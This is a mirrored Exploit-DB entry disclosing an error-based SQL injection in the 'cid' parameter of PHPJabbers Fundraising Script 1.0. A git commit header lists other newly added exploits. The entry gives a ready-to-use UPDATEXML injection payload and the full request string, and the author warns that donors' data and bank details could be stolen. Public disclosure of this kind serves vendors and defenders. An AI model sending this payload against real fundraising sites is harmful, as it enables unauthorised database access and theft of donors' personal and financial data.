exploit-db-mirror/exploits/php/webapps/51753.TXT
Exploit-DB a5920da7af DB: 2024-01-30
10 changes to exploits/shellcodes/ghdb

Ricoh Printer - Directory and File Exposure

Blood Bank & Donor Management System using v2.2 - Stored XSS

Equipment Rental Script-1.0 - SQLi

Bank Locker Management System - SQL Injection

Fundraising Script 1.0 - SQLi

PHP Shopping Cart 4.2 - Multiple-SQLi

7 Sticky Notes v1.9 - OS Command Injection

Typora v1.7.4 - OS Command Injection
2024-01-30 00:16:26 +00:00

29 lines
No EOL
1.1 KiB
Text

## Title: Fundraising Script-1.0 SQLi
## Author: nu11secur1ty
## Date: 09/13/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `cid` parameter appears to be vulnerable to SQL injection attacks.
The payload ' was submitted in the cid parameter, and a database error
message was returned.
The database is empty, but if it is not, this will be over for the
money of the donors and their bank accounts!
The attacker can steal all information from the database!
[+]Payload:
mysql
Parameter: cid (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT
(ELT(1741=1741,1))),0x7162787171),3873))
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
nu11secur1ty <http://nu11secur1ty.com/>